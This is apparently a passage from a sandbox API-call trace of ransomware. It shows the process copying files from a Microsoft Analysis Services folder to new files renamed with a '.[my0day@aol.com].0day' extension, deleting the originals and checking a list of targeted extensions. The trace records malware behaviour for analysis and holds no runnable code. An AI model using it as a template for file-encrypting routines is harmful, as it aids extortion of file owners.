lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.823] GetLastError () returned 0x0 [0051.823] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x4360, lpOverlapped=0x0) returned 1 [0051.825] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x4370, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x4370, lpOverlapped=0x0) returned 1 [0051.826] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.826] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0051.826] SetEndOfFile (hFile=0x210) returned 1 [0051.826] CloseHandle (hObject=0x210) returned 1 [0051.826] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.827] SetEndOfFile (hFile=0x220) returned 1 [0051.827] CloseHandle (hObject=0x220) returned 1 [0051.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.828] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl")) returned 1 [0051.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0051.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0051.828] lstrlenW (lpString=".doc") returned 4 [0051.828] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0051.828] lstrlenW (lpString=".docx") returned 5 [0051.828] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0051.828] lstrlenW (lpString=".pdf") returned 4 [0051.828] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0051.828] lstrlenW (lpString=".xls") returned 4 [0051.828] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0051.828] lstrlenW (lpString=".xlsx") returned 5 [0051.828] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0051.828] lstrlenW (lpString=".ppt") returned 4 [0051.828] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0051.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0051.828] lstrlenW (lpString=".zip") returned 4 [0051.828] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0051.828] lstrlenW (lpString=".rar") returned 4 [0051.828] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0051.828] lstrlenW (lpString=".bz2") returned 4 [0051.828] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0051.828] lstrlenW (lpString=".7z") returned 3 [0051.828] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0051.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0051.829] lstrlenW (lpString=".dbf") returned 4 [0051.829] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0051.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0051.829] lstrlenW (lpString=".1cd") returned 4 [0051.829] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0051.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0051.829] lstrlenW (lpString=".jpg") returned 4 [0051.829] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0051.830] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=18738) returned 1 [0051.830] CloseHandle (hObject=0x220) returned 1 [0051.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl")) returned 0x20 [0051.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.830] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.830] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.830] GetLastError () returned 0x0 [0051.830] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x4932, lpOverlapped=0x0) returned 1 [0051.838] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x4940, lpOverlapped=0x0) returned 1 [0051.861] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.862] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0051.862] SetEndOfFile (hFile=0x210) returned 1 [0051.862] CloseHandle (hObject=0x210) returned 1 [0051.862] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.862] SetEndOfFile (hFile=0x220) returned 1 [0051.863] CloseHandle (hObject=0x220) returned 1 [0051.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.863] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl")) returned 1 [0051.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0051.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0051.863] lstrlenW (lpString=".doc") returned 4 [0051.863] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0051.863] lstrlenW (lpString=".docx") returned 5 [0051.863] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0051.863] lstrlenW (lpString=".pdf") returned 4 [0051.863] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0051.864] lstrlenW (lpString=".xls") returned 4 [0051.864] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0051.864] lstrlenW (lpString=".xlsx") returned 5 [0051.864] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0051.864] lstrlenW (lpString=".ppt") returned 4 [0051.864] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0051.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0051.864] lstrlenW (lpString=".zip") returned 4 [0051.864] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0051.864] lstrlenW (lpString=".rar") returned 4 [0051.864] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0051.864] lstrlenW (lpString=".bz2") returned 4 [0051.864] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0051.864] lstrlenW (lpString=".7z") returned 3 [0051.864] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0051.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0051.864] lstrlenW (lpString=".dbf") returned 4 [0051.864] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0051.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0051.864] lstrlenW (lpString=".1cd") returned 4 [0051.864] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0051.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0051.864] lstrlenW (lpString=".jpg") returned 4 [0051.864] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0051.864] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=30948) returned 1 [0051.864] CloseHandle (hObject=0x220) returned 1 [0051.865] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 0x20 [0051.865] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.865] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.865] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.865] GetLastError () returned 0x0 [0051.865] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x78e4, lpOverlapped=0x0) returned 1 [0051.867] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x78f0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x78f0, lpOverlapped=0x0) returned 1 [0051.868] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.868] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.868] SetEndOfFile (hFile=0x210) returned 1 [0051.868] CloseHandle (hObject=0x210) returned 1 [0051.869] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.869] SetEndOfFile (hFile=0x220) returned 1 [0051.869] CloseHandle (hObject=0x220) returned 1 [0051.870] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.870] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 1 [0051.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0051.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0051.870] lstrlenW (lpString=".doc") returned 4 [0051.870] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0051.870] lstrlenW (lpString=".docx") returned 5 [0051.870] lstrcmpiW (lpString1=".docx", lpString2="x.xsl") returned -1 [0051.870] lstrlenW (lpString=".pdf") returned 4 [0051.870] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0051.870] lstrlenW (lpString=".xls") returned 4 [0051.870] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0051.870] lstrlenW (lpString=".xlsx") returned 5 [0051.870] lstrcmpiW (lpString1=".xlsx", lpString2="x.xsl") returned -1 [0051.870] lstrlenW (lpString=".ppt") returned 4 [0051.870] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0051.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0051.870] lstrlenW (lpString=".zip") returned 4 [0051.870] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0051.870] lstrlenW (lpString=".rar") returned 4 [0051.870] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0051.870] lstrlenW (lpString=".bz2") returned 4 [0051.870] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0051.870] lstrlenW (lpString=".7z") returned 3 [0051.870] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0051.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0051.871] lstrlenW (lpString=".dbf") returned 4 [0051.871] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0051.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0051.871] lstrlenW (lpString=".1cd") returned 4 [0051.871] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0051.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0051.871] lstrlenW (lpString=".jpg") returned 4 [0051.871] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0051.871] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=28974) returned 1 [0051.871] CloseHandle (hObject=0x220) returned 1 [0051.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl")) returned 0x20 [0051.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.871] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.871] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.872] GetLastError () returned 0x0 [0051.872] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x712e, lpOverlapped=0x0) returned 1 [0051.873] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x7130, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x7130, lpOverlapped=0x0) returned 1 [0051.874] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.875] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0051.875] SetEndOfFile (hFile=0x210) returned 1 [0051.875] CloseHandle (hObject=0x210) returned 1 [0051.875] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.875] SetEndOfFile (hFile=0x220) returned 1 [0051.876] CloseHandle (hObject=0x220) returned 1 [0051.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.876] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl")) returned 1 [0051.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0051.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0051.876] lstrlenW (lpString=".doc") returned 4 [0051.876] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0051.876] lstrlenW (lpString=".docx") returned 5 [0051.876] lstrcmpiW (lpString1=".docx", lpString2="t.xsl") returned -1 [0051.876] lstrlenW (lpString=".pdf") returned 4 [0051.876] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0051.876] lstrlenW (lpString=".xls") returned 4 [0051.876] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0051.876] lstrlenW (lpString=".xlsx") returned 5 [0051.876] lstrcmpiW (lpString1=".xlsx", lpString2="t.xsl") returned -1 [0051.876] lstrlenW (lpString=".ppt") returned 4 [0051.876] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0051.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0051.877] lstrlenW (lpString=".zip") returned 4 [0051.877] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0051.877] lstrlenW (lpString=".rar") returned 4 [0051.877] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0051.877] lstrlenW (lpString=".bz2") returned 4 [0051.877] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0051.877] lstrlenW (lpString=".7z") returned 3 [0051.877] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0051.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0051.877] lstrlenW (lpString=".dbf") returned 4 [0051.877] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0051.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0051.877] lstrlenW (lpString=".1cd") returned 4 [0051.877] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0051.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0051.877] lstrlenW (lpString=".jpg") returned 4 [0051.877] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0051.878] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=34076) returned 1 [0051.878] CloseHandle (hObject=0x220) returned 1 [0051.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 0x20 [0051.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.878] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.878] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.879] GetLastError () returned 0x0 [0051.879] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x851c, lpOverlapped=0x0) returned 1 [0051.880] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x8520, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x8520, lpOverlapped=0x0) returned 1 [0051.882] ReadFile (in: hFile=0x220, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.882] WriteFile (in: hFile=0x210, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0051.882] SetEndOfFile (hFile=0x210) returned 1 [0051.882] CloseHandle (hObject=0x210) returned 1 [0051.882] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.882] SetEndOfFile (hFile=0x220) returned 1 [0051.883] CloseHandle (hObject=0x220) returned 1 [0051.883] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.883] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 1 [0051.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0051.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0051.883] lstrlenW (lpString=".doc") returned 4 [0051.883] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0051.883] lstrlenW (lpString=".docx") returned 5 [0051.884] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0051.884] lstrlenW 